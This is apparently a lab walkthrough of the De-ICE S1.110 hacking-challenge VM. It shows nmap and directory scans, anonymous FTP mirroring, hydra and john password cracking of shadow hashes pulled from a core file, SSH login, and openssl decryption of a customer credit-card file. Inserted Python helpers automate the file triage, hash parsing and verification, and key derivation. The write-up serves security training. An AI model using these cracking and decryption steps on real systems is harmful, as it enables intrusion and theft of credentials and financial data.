About the De_ICE_S1.110 walkthrough
https://www.youtube.com/watch?v=oLM6L1_LYV0&feature=youtu.be
https://blog.techorganic.com/2011/07/20/de-ice-hacking-challenge-part-2/
https://blog.g0tmi1k.com/2010/02/de-icenet-v11-1110-level-1-disk-2/
https://pur3h4t3.blogspot.com/2007/12/de-ice-pentest-disc-1100.html
First, scan with nmap:
nmap -sC -sV -p- -oA deice110 10.57.31.34
The scan results hint at the tools that will probably be needed:
nmap
ftp
strings
john the ripper
ssh
- FTP can be set for anonymous login exclusively
- Find out what files don't belong in a directory, and look at it closely
- If you can't crack the passwords, make sure you understand all the flags within john the ripper
- If you get customer credit card information, you've defeated this challenge. Congratulations
Try the usual tools to brute-force the target site's directories:
python3 dirsearch.py -u http://10.57.31.34 -w /usr/share/dirb/wordlists/big.txt -e php
dirb http://10.57.31.34 -w /usr/share/dirb/wordlists/common.txt
gobuster dir -u http://10.57.31.34 -w /usr/share/wordlists/dirb/big.txt
The scan shows FTP is open and allows anonymous login, so log in to FTP and download every folder on it. Among them is the "cygwin" toolkit; looking it up, it is simply a suite that lets Linux commands run under Windows.
The FTP client used here is lftp. I like this tool a lot because it supports Tab completion. The command to download every folder on the FTP server is:
mirror download download    (the first argument is the remote folder to download, the second is the name of the local folder to save it in)
After the download finishes, go into the download folder and run: ls -lsaR * > ftplistanaysis.txt
That lists everything in every folder, including the names and sizes of the files in all subdirectories.
Then review the listing locally in a GUI or vim editor to see at a glance which sensitive files can be used.
On review, two files contained sensitive information: core and shadow.
At first I had not noticed that core hid important sensitive information; I had only found the shadow file and tried cracking its passwords with john.
The sensitive files found were:
/etc/shadow
/opt/cygwin/etc/passwd, group, bash.bashrc
/opt/cygwin/etc/default/etc/bash.bashrc
/usr/bin/websave
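Rather than eyeballing the ls -lsaR listing, the triage of a mirrored FTP tree can be scripted. The following is an added example, not code from the original writeup: it walks a mirror directory, flags files by name (the names the challenge hint and this writeup turned out to care about: shadow, passwd, group, core, pw, and .enc/.sh/.csv files) and by content (ELF magic, shadow-style crypt(3) hashes, and the Salted__ header that openssl enc writes). The name list is my own choice, and the sample tree it builds is constructed for the demo; it is not the real De-ICE FTP contents.

```python
import os
import re
import tempfile

# File names worth a second look: the ones the challenge hint calls "files
# that don't belong", plus openssl output, scripts and exported data.
INTERESTING_NAME = re.compile(r"^(shadow|passwd|group|core|pw)$|\.(enc|sh|csv)$")
ELF_MAGIC = b"\x7fELF"
# user:$id$salt$hash, as it appears in shadow(5) or in a dump of it.
CRYPT_HASH = re.compile(rb"[A-Za-z0-9_-]+:\$[0-9a-z]+\$[^:\s]+")
MAX_READ = 4 * 1024 * 1024  # cap content sniffing at 4 MiB per file


def classify(path):
    """Return the list of reasons a file deserves attention (empty if none)."""
    tags = []
    if INTERESTING_NAME.search(os.path.basename(path)):
        tags.append("name")
    try:
        with open(path, "rb") as fh:
            data = fh.read(MAX_READ)
    except OSError:
        return tags
    if data.startswith(ELF_MAGIC):
        tags.append("elf")             # e.g. the core file hiding a .useless section
    if CRYPT_HASH.search(data):
        tags.append("crypt-hash")      # shadow-style hashes wherever they live
    if data.startswith(b"Salted__"):
        tags.append("openssl-salted")  # output of `openssl enc -salt`
    return tags


def triage(root):
    """Walk a mirrored tree and map relative path -> tags for flagged files."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            tags = classify(path)
            if tags:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = tags
    return hits


def build_sample_tree():
    """Constructed stand-in for the lftp mirror (not the real De-ICE tree)."""
    root = tempfile.mkdtemp(prefix="deice_mirror_")
    files = {
        "etc/shadow": b"root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::\n"
                      b"bin:*:9797:0:::::\n",
        "opt/cygwin/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n",
        # a fake ELF header followed by a hash line, like the real core file
        "core": ELF_MAGIC + b"\x01\x01\x01" + b"\x00" * 64
                + b".useless\x00root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::",
        "home/ftp/README": b"Welcome to the anonymous FTP server\n",
        "home/root/.save/customer_account.csv.enc":
            b"Salted__" + bytes(range(8)) + b"\x00" * 32,
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for path, tags in sorted(triage(build_sample_tree()).items()):
        print(f"{path}: {', '.join(tags)}")
```

Run it against the local download directory instead of the sample tree to get the short list in one pass; on this box the real core would be reported as both elf and crypt-hash, which is exactly the thing that was missed on the first look.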
First, try hydra to see whether any account has a simple password that can be guessed:
hydra -L usernames.txt -P finalusername.txt -e nsr -u -t 8 10.57.31.34 ssh
That did not succeed, so crack the shadow file downloaded from FTP directly:
cat shadow
root:$1$3OF/pWTC$lvhdyl86pAEQcrvepWqpu.:12859:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
- Brute-forcing with darkc0de.txt succeeded
- source: https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/darkc0de.txt
- The account and password are root:toor
john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt shadow
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
toor (root)
1g 0:00:00:03 DONE (2019-11-17 12:01) 0.2645g/s 341942p/s 341942c/s 341942C/s too-big..Toothaker
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show shadow
root:toor:12859:0:::::
1 password hash cracked, 0 left
- But that password turned out to be wrong: it could not log in, and root is not allowed to log in remotely directly anyway
- So, after exploring further, I found that a file named core contains sensitive information
- Inspect the core file with the strings command, since the file command reports it as an ELF executable
- The output is as follows:
strings core |tail
.dynstr
.gnu.version
.gnu.version_d
.text
.note
.eh_frame_hdr
.eh_frame
.dynamic
.useless
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
- Tidy the output above into one record per line in shadow(5) format so john can brute-force it directly; the tidied file is named passwd:
cat passwd
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
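The tidying above was done by hand. As an added example (not part of the original post), here is a parser that splits the run-together .useless text from strings into shadow(5) records. The blob it embeds is copied from the strings output above; the regex relies on a shadow record having exactly nine colon-separated fields, the last seven of which are decimal or empty, so it also works on an ordinary newline-separated shadow file.

```python
import re
import sys

# The .useless section that `strings core` printed on the target: 24 shadow
# records run together with no line breaks (copied from the output above).
USELESS_BLOB = (
    "root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::"
    "bin:*:9797:0:::::daemon:*:9797:0:::::adm:*:9797:0:::::lp:*:9797:0:::::"
    "sync:*:9797:0:::::shutdown:*:9797:0:::::halt:*:9797:0:::::"
    "mail:*:9797:0:::::news:*:9797:0:::::uucp:*:9797:0:::::"
    "operator:*:9797:0:::::games:*:9797:0:::::ftp:*:9797:0:::::"
    "smmsp:*:9797:0:::::mysql:*:9797:0:::::rpc:*:9797:0:::::"
    "sshd:*:9797:0:::::gdm:*:9797:0:::::pop:*:9797:0:::::nobody:*:9797:0:::::"
    "aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::"
    "bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::"
    "ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::"
)

# One shadow(5) record: name, password field, then seven fields that are
# either decimal or empty (lastchg:min:max:warn:inactive:expire:flag).
# The nine fields are separated by exactly eight colons, so a record ends
# after the eighth colon plus any trailing digits, and the next user name
# begins right there even when no newline separates the records.
RECORD = re.compile(
    r"(?P<name>[A-Za-z_][A-Za-z0-9_-]*):"
    r"(?P<pw>[^:\s]*):"
    r"(?P<rest>(?:\d*:){6}\d*)"
)


def parse_shadow(text):
    """Return a list of 9-field records from a shadow file or from the blob."""
    records = []
    for m in RECORD.finditer(text):
        records.append([m.group("name"), m.group("pw")] + m.group("rest").split(":"))
    return records


def shadow_lines(records):
    """Re-serialise records one per line, ready to hand to john."""
    return [":".join(r) for r in records]


def crackable(records):
    """Only crypt(3) hashes are worth john's time; '*', '!' and '' are not."""
    return [r for r in records if r[1].startswith("$")]


if __name__ == "__main__":
    blob = open(sys.argv[1]).read() if len(sys.argv) > 1 else USELESS_BLOB
    for line in shadow_lines(parse_shadow(blob)):
        print(line)
```

Redirect the printed lines into a file and pass it to john as the writeup does; crackable() gives the same four accounts the --user option selects below.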
- Brute-force with the darkc0de.txt dictionary, restricting john to the four accounts that actually have a hash:
john --wordlist=/usr/share/wordlists/seclist/scanlist/Passwords/darkc0de.txt --user=root,aadams,bbanter,ccoffee passwd
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Complexity (root)
Zymurgy (bbanter)
2g 0:00:00:13 DONE (2019-11-17 12:26) 0.1515g/s 107371p/s 351000c/s 351000C/s Zuzana..zzzzzzzzzzzzzzz
Use the "--show" option to display all of the cracked passwords reliably
Session completed
john --show passwd
root:Complexity:13574:0:::::
bbanter:Zymurgy:13571:0:99999:7:::
2 password hashes cracked, 2 left
root:Complexity
bbanter:Zymurgy
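john's --show output can be double-checked without john. The following added example (not from the original post) implements crypt(3) md5crypt, the $1$ scheme john detected, in pure Python on top of hashlib, and re-verifies the cracked passwords against the hashes recovered from core. The hashes are the page's; the code is mine.

```python
import hashlib
import hmac

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value, n):
    """crypt(3)-style base64: n characters, least significant 6 bits first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: bytes, salt: bytes) -> str:
    """crypt(3) $1$ (FreeBSD md5crypt), the scheme of every hash on this page."""
    magic = b"$1$"
    salt = salt.split(b"$", 1)[0][:8]           # at most 8 salt characters
    ctx = hashlib.md5(password + magic + salt)
    alt = hashlib.md5(password + salt + password).digest()
    pl = len(password)
    while pl > 0:                                # mix in len(password) bytes of alt
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(password)
    while i:                                     # one byte per bit of the length
        ctx.update(b"\x00" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                        # the 1000-round stretching loop
        ctx1 = hashlib.md5()
        ctx1.update(password if i & 1 else final)
        if i % 3:
            ctx1.update(salt)
        if i % 7:
            ctx1.update(password)
        ctx1.update(final if i & 1 else password)
        final = ctx1.digest()
    out = ""
    for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)):
        out += _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
    out += _to64(final[11], 2)
    return (magic + salt).decode() + "$" + out


def verify(password: str, shadow_hash: str) -> bool:
    """True if password matches a $1$ hash; '*', '!' and other schemes never match."""
    if not shadow_hash.startswith("$1$"):
        return False
    salt = shadow_hash.split("$")[2]
    return hmac.compare_digest(md5crypt(password.encode(), salt.encode()), shadow_hash)


# The four crypt(3) hashes recovered from the core file (copied from the page).
SHADOW = {
    "root": "$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30",
    "aadams": "$1$klZ09iws$fQDiqXfQXBErilgdRyogn.",
    "bbanter": "$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1",
    "ccoffee": "$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/",
}


def check_cracked(cracked, shadow=SHADOW):
    """Re-check user:password pairs from john against the hashes; returns {user: bool}."""
    return {user: verify(pw, shadow[user]) for user, pw in cracked.items() if user in shadow}


if __name__ == "__main__":
    print(check_cracked({"root": "Complexity", "bbanter": "Zymurgy", "aadams": "toor"}))
```

The same function shows why the first attempt failed: "toor" matches the root hash in the shadow file served over FTP but not the root hash inside core, which is the one the live system actually uses.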
In the end two accounts and passwords were cracked. Log in over SSH as the ordinary user, then switch to root with su.
Start looking for encrypted files:
find / -name '*.enc'  (or, case-insensitively, find / -iname '*.enc'; quote the glob so the shell does not expand it before find sees it)
find / -name *.enc
/mnt/live/mnt/hdc/rootcopy/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
/mnt/live/mnt/hdc/rootcopy/home/root/.save/customer_account.csv.enc
find: WARNING: Hard link count is wrong for /mnt/live/proc/5934: this may be a bug in your filesystem driver. Automatically turning on find's -noleaf option. Earlier results may have failed to include directories that should have been searched.
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin1.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin2.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/IsoLatin9.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/PSLatin1.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/dc.enc
/mnt/live/memory/images/05_common.mo/usr/share/t1lib/Fonts/enc/dvips.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/big5.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/euc-kr.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-2.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-3.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-4.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-5.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-7.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-8.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-9.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1250.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1252.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-jisx0221.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-unicode.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-cp932.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jdk117.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jisx0221.enc
/mnt/live/memory/images/02_core.mo/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-unicode.enc
/mnt/live/memory/images/02_core.mo/usr/share/groff/1.19.2/font/devps/text.enc
/mnt/live/memory/changes/home/root/.save/customer_account.csv.enc
/mnt/live/memory/changes/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
/usr/share/t1lib/Fonts/enc/IsoLatin1.enc
/usr/share/t1lib/Fonts/enc/IsoLatin2.enc
/usr/share/t1lib/Fonts/enc/IsoLatin9.enc
/usr/share/t1lib/Fonts/enc/PSLatin1.enc
/usr/share/t1lib/Fonts/enc/dc.enc
/usr/share/t1lib/Fonts/enc/dvips.enc
/usr/share/groff/1.19.2/font/devps/text.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/big5.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/euc-kr.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-2.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-3.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-4.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-5.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-7.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-8.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/iso-8859-9.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1250.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/windows-1252.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-jisx0221.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-euc-jp-unicode.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-cp932.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jdk117.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-jisx0221.enc
/usr/lib/perl5/site_perl/5.8.8/i486-linux/XML/Parser/Encodings/x-sjis-unicode.enc
/home/root/.save/customer_account.csv.enc
/home/ftp/download/opt/cygwin/usr/share/groff/1.18.1/font/devps/text.enc
- The encrypted file was found, and next to it sits a script, copy.sh
- The script contains the following:
root@slax:/home/root/.save# cat copy.sh
#!/bin/sh
#encrypt files in ftp/incoming
openssl enc -aes-256-cbc -salt -in /home/ftp/incoming/$1 -out /home/root/.save/$1.enc -pass file:/etc/ssl/certs/pw
#remove old file
rm /home/ftp/incoming/$1
root@slax:/home/root/.save# ls /etc/ssl/certs/pw
/etc/ssl/certs/pw
root@slax:/home/root/.save# cat /etc/ssl/certs/pw
d2Ews4TgaQm72C0nr5t5U9noRfdllV62speWeC410il1lfd3Cxe2RqSx5o0Of
root@slax:/home/root/.save# ls
copy.sh* customer_account.csv.enc
root@slax:/home/root/.save# file customer_account.csv.enc
customer_account.csv.enc: data
root@slax:/home/root/.save# strings customer_account.csv.enc
Salted__
,xM' 7Uz
`@Tw
Ab(H
/PQ)oph
X2$,
0DZR"
nz,"y
- Now it is all clear: the algorithm and the password file are known, so adding -d decrypts the file
- openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out /home/root/customer_account.csv -pass file:/etc/ssl/certs/pw
- View the decrypted file:
root@slax:/home/root/.save# cat /home/root/customer_account.csv
"CustomerID","CustomerName","CCType","AccountNo","ExpDate","DelMethod"
1002,"Mozart Exercise Balls Corp.","VISA","2412225132153211","11/09","SHIP"
1003,"Brahms 4-Hands Pianos","MC","3513151542522415","07/08","SHIP"
1004,"Strauss Blue River Drinks","MC","2514351522413214","02/08","PICKUP"
1005,"Beethoven Hearing-Aid Corp.","VISA","5126391235199246","09/09","SHIP"
1006,"Mendelssohn Wedding Dresses","MC","6147032541326464","01/10","PICKUP"
1007,"Tchaikovsky Nut Importer and Supplies","VISA","4123214145321524","05/08","SHIP"
root@slax:/home/root/.save#
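The Salted__ string that strings printed is the header of the openssl enc container, and the password file is only read up to its first line. As an added example, not from the original post, the code below parses that header and reproduces OpenSSL's EVP_BytesToKey derivation of the AES-256-CBC key and IV, for both the MD5 digest that a 2007-era OpenSSL used and the SHA-256 digest that current releases default to. The sample container is constructed with a fixed salt and dummy ciphertext, and the password file content is the one shown above; the code derives the key material but does not perform the AES decryption itself.

```python
import hashlib

SALTED_MAGIC = b"Salted__"


def parse_salted_header(data):
    """Split an `openssl enc -salt` blob into (salt, ciphertext).

    Layout: b"Salted__" || 8-byte random salt || ciphertext (PKCS#7 padded).
    The magic string is what `strings customer_account.csv.enc` printed.
    """
    if len(data) < 16 or not data.startswith(SALTED_MAGIC):
        raise ValueError("not an OpenSSL Salted__ container")
    return data[8:16], data[16:]


def password_from_pass_file(raw):
    """`-pass file:PATH` uses only the first line of the file, newline stripped."""
    return raw.split(b"\n", 1)[0]


def evp_bytes_to_key(password, salt, key_len, iv_len, md="md5", count=1):
    """OpenSSL EVP_BytesToKey: D_1 = H(pw||salt), D_i = H(D_{i-1}||pw||salt),
    concatenated until key_len + iv_len bytes are available."""
    derived = b""
    prev = b""
    while len(derived) < key_len + iv_len:
        digest = hashlib.new(md, prev + password + salt).digest()
        for _ in range(count - 1):          # count > 1 re-hashes the block
            digest = hashlib.new(md, digest).digest()
        derived += digest
        prev = digest
    return derived[:key_len], derived[key_len:key_len + iv_len]


def aes256cbc_params(enc_data, pass_file_data, md):
    """Salt, 32-byte key, 16-byte IV and ciphertext for `enc -d -aes-256-cbc`."""
    salt, ciphertext = parse_salted_header(enc_data)
    key, iv = evp_bytes_to_key(password_from_pass_file(pass_file_data), salt, 32, 16, md)
    return {"salt": salt, "key": key, "iv": iv, "ciphertext": ciphertext}


# Constructed sample: the password file content is the one shown on the page;
# the container is a fake header with a fixed salt and dummy ciphertext.
PW_FILE = b"d2Ews4TgaQm72C0nr5t5U9noRfdllV62speWeC410il1lfd3Cxe2RqSx5o0Of\n"
SAMPLE_ENC = SALTED_MAGIC + bytes(range(8)) + b"\x00" * 32


def legacy_vs_modern(enc_data=SAMPLE_ENC, pass_file_data=PW_FILE):
    """Key/IV as a 2007-era OpenSSL (md5) and a current one (sha256) derive them."""
    return (aes256cbc_params(enc_data, pass_file_data, "md5"),
            aes256cbc_params(enc_data, pass_file_data, "sha256"))


if __name__ == "__main__":
    old, new = legacy_vs_modern()
    print("salt      :", old["salt"].hex())
    print("md5 key   :", old["key"].hex())
    print("sha256 key:", new["key"].hex())
```

The practical caveat this illustrates: OpenSSL 1.1.0 and later default this derivation to SHA-256, while the OpenSSL on the target used MD5, so the two derive different keys from the same password and salt. Decrypting on the target works as shown above; decrypting an exfiltrated copy on a current machine needs -md md5 added to the openssl enc -d command, otherwise it fails with "bad decrypt".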
- Notes on alternative approaches
- wget -qr ftp://10.7.9.25 (recursively downloads every file on the FTP server in one go)
- https://hackerzoneh.blogspot.com/
#!/usr/bin/env python3
# shadow2pass: generate a dummy passwd file with
# the encrypted passwords from a shadow file
import sys

start_uid = 500  # arbitrary starting UID, incremented per account
start_gid = 500  # arbitrary GID, the same for every account

for line in open(sys.argv[1]):
    line = line.rstrip("\n")
    if not line:
        continue  # skip blank lines instead of crashing on them
    a = line.split(":")
    # passwd(5) layout: name:hash:uid:gid:gecos:home:shell
    print("%s:%s:%d:%d:,,,:/home/%s:/bin/bash" %
          (a[0], a[1], start_uid, start_gid, a[0]))
    start_uid += 1
root@tantras# ~/bin/shadow2pass myshadow.txt > mypass.txt
root@tantras# cat mypass.txt
root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:500:500:,,,:/home/root:/bin/bash
aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:501:500:,,,:/home/aadams:/bin/bash
bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:502:500:,,,:/home/bbanter:/bin/bash
ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:503:500:,,,:/home/ccoffee:/bin/bash
Disclaimer: the articles I write are for learning and research only. Do not use the techniques or source code in them for illegal purposes; any negative consequences or legal violations caused by anyone are unrelated to me.